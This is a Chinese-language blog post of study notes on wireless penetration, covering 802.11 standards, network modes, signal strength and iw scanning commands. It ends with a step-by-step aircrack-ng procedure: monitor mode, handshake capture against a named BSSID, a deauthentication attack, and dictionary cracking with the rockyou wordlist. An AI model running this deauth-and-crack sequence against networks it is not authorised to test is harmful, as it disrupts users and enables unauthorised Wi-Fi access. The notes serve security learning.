无线攻击

无线渗透

无线局域网
IEEE 802委员会负责LAN(局域网),MAN(城域网)等
802.3 Ethernet局域网
*802.11 wireless LAN(WLAN) and Mesh(Wi-Fi)
802.15 个人网络,蓝牙等

802.11工作在物理层,数据链路层,无线频宽资源有限(国家严格控制)
发展史
1)802.11(1997年)
DSSS,FHSS编码 2.4GHz
2)802.11b(1999年)
2400-2485的范围,频道紧张只有85
14个重叠信道,每个信道有具体的范围
3)802.11a(1999年) 与b几乎同时发布
2.4GHz干扰源多(微波,无线电话,蓝牙)
5GHz
4)802.11g
5)802.11n
300Mbps 多进多出,一般四个,多个天线


无线网络运行模式
Infrastructure架构 例如家庭路由
SSID:无线名,无线服务级标识符
AP(路由器)每秒约10次通过Beacon帧广播SSID
客户端连接到无线网络后也会宣告SSID:我已经连接某个AP
至少包含一个AP和一个STATION,形成BSS 有一个BSSID
多个AP连接DS 会有一个总ESSID

AD-HOC
IBSS 独立模式,点到点模式,没有AP
有至少2个STAs,其中一个STA负责AP的工作

WDS无线分布式模式


查看无线网卡信息
iwconfig
iw list

iw dev wlan2 scan //iw 无线命令 dev 硬件 wlan2:网卡名 scan:扫描
iw dev wlan2 scan | grep SSID //一般


分贝
信号在空气中传输会损耗,小于1nw都是负数
接收强度
0到-50都是可以稳定传输的 信号好
-50到-75 一般
-75到-130 差
-130不可达
signal:-92dBm

如果有冲突
service network stop
添加侦听
iw dev wlan2 interface add wlan2mon type monitor //interface add 新添加接口 加 名称 type:类型

iwconfig 查看后会发现 多了个 wlan2mon
ifconfig wlan2mon up 启动
启动后就可以抓包了


**********************************测试一**********************************************
sudo airmon-ng start wlan0 //开启monitor 模式
sudo iwconfig

sudo airodump-ng wlan0mon //查看附近wifi

sudo airodump-ng -c 13 -w /home/kali/er8 --bssid 08:1F:71:10:35:56 wlan0mon //监听抓包
-c 信道 -w 抓包保存路径 --bassid 监听AP的mac地址 监听本机网卡名字

sudo aireplay-ng -0 5 -a B4:0F:3B:1C:F2:48 wlan0mon //攻击5次

sudo aircrack-ng -w /home/kali/mi/300w_wifi.txt /home/kali/er8-01.cap //暴力破解
sudo aircrack-ng -w 字典路径 保存的数据包的路径


1、使用kali自带千万密钥字典
• cd /usr/share/wordlists/
• sudo gzip -d rockyou.txt.gz
• sudo cp rockyou.txt rockyou.txt.bak

***************************************************************************************

 

posted @ 2020-09-26 23:20  包子TT  阅读(188)  评论(0编辑  收藏  举报